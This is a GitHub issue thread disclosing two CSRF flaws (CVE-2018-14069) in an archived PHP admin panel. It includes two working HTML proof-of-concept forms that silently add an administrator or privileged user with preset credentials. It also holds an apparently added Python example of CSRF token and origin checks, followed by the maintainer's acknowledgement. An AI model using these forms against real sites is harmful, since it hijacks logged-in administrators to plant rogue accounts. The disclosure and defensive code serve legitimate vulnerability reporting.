This repository has been archived by the owner on Apr 14, 2021. It is now read-only.

There are two CSRF vulnerabilities that can add an administrator account #20

Closed
FiveAourThe opened this issue Jul 13, 2018 · 2 comments
Comments

@FiveAourThe

After the administrator has logged in, open the following two pages.
PoC:
add_admin.html

<html>
<form action="http://127.0.0.1/admin.php?m=Admin&c=manager&a=add" method="post">
	<div class="form-group">
		<label>用户名</label>
		<input class="form-control" type="text" name="username" value="csrf">
	</div>
	<div class="form-group">
		<label>邮箱</label>
		<input class="form-control" type="text" name="email" value="csrf@test.com">
	</div>
	<div class="form-group">
		<label>密码</label>
		<input class="form-control" type="password" name="password" value="123456">
	</div>
	<div class="form-group">
		<label>确认密码</label>
		<input class="form-control" type="password" name="repassword" value="123456">
	</div>
	<div class="form-group">
		<button class="btn btn-success" type="submit" >添加</button>
	</div>


</form>
</html>

add_user.html

<html>
<form action="http://127.0.0.1/admin.php?m=Admin&c=member&a=add" method="post">
	<div class="form-group">
		<label>用户名</label>
		<input class="form-control" type="text" name="username" value="test">
	</div>
	<div class="form-group">
		<label>邮箱</label>
		<input class="form-control" type="text" name="email" value="test@test.com">
	</div>
	<div class="form-group">
		<label>密码</label>
		<input class="form-control" type="password" name="password" value="123456">
	</div>
	<div class="form-group">
		<label>确认密码</label>
		<input class="form-control" type="password" name="repassword" value="123456">
	</div>
	<div class="form-group">
        <label>用户等级</label>
        <label class="radio-inline">
          <input type="radio" name="type" id="type" value="1" >路人
        </label>
        <label class="radio-inline">
          <input type="radio" name="type" id="type" value="2" >实习白帽子
        </label>
		<label class="radio-inline">
          <input type="radio" name="type" id="type" value="3" >普通白帽子
        </label>
        <label class="radio-inline">
          <input type="radio" name="type" id="type" checked="checked" value="4" >核心白帽子
        </label>
    </div>
	<div class="form-group">
        <label>用户状态</label>
        <label class="radio-inline">
          <input type="radio" name="status" id="status" value="0">禁止登陆
        </label>
        <label class="radio-inline">
          <input type="radio" name="status" id="status" value="1"  checked="checked">正常
        </label>
    </div>
	<div class="form-group">
		<button class="btn btn-success" type="submit" >添加</button>
	</div>


</form>
</html>
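As an added, defender-side example (not code from this repository, which is PHP; written in Python to illustrate the check), a request gate for the admin "add" action that rejects the PoC's cross-site, token-less POST and accepts the same form when it carries a session-bound CSRF token. The server secret, session ids and request shapes are constructed for the example.

```python
import hmac
import hashlib
from urllib.parse import urlsplit

# Constructed values: in a real deployment the secret comes from configuration
# and the session id from the session store (e.g. PHPSESSID).
SERVER_SECRET = b"constructed-server-secret"
SITE_ORIGIN = "http://127.0.0.1"  # origin of admin.php in the PoC


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session via HMAC; embed it as a hidden field
    in the add-admin / add-user forms so the attacker's page cannot know it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_admin_add(request: dict, session_id: str) -> tuple[bool, str]:
    """Gate for POST admin.php?m=Admin&c=manager&a=add (and c=member&a=add).

    `request` is a constructed dict with keys 'method', 'headers' and 'form'.
    Reject when the browser-supplied Origin/Referer is not our site (the PoC page
    is served from elsewhere) or when the form lacks a valid token (the PoC form
    has no token field at all). The token is the primary control; the origin
    check is defence in depth for browsers that send those headers.
    """
    if request["method"].upper() != "POST":
        return False, "state-changing action requires POST"
    headers = {k.lower(): v for k, v in request["headers"].items()}
    source = headers.get("origin") or headers.get("referer")
    if source:
        parts = urlsplit(source)
        origin = f"{parts.scheme}://{parts.netloc}"
        if origin != SITE_ORIGIN:
            return False, f"cross-site request from {origin}"
    token = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(token, issue_csrf_token(session_id)):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed request shaped like the add_admin.html PoC: cross-site, no token.
POC_REQUEST = {
    "method": "POST",
    "headers": {"Origin": "http://attacker.example"},
    "form": {"username": "csrf", "email": "csrf@test.com",
             "password": "123456", "repassword": "123456"},
}


def legitimate_request(session_id: str) -> dict:
    """The same form submitted from the real admin UI, carrying the session-bound token."""
    req = {"method": "POST", "headers": {"Origin": SITE_ORIGIN},
           "form": dict(POC_REQUEST["form"])}
    req["form"]["csrf_token"] = issue_csrf_token(session_id)
    return req
```

The token must also be compared against the session of the user actually making the request, so a token issued for one session does not validate another.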
@martinzhou2015
Owner

Hi,

Sorry for the late reply. Thanks for your constructive suggestion.

I've noticed the flaw exists in the place you pointed out. The flaw will be fixed in the next version.

Again, your feedback is highly appreciated. Please let us know if you have more questions.

@NicoleG25

@martinzhou2015 Could you please point out the commit where this was addressed?
Note that CVE-2018-14069 was assigned.
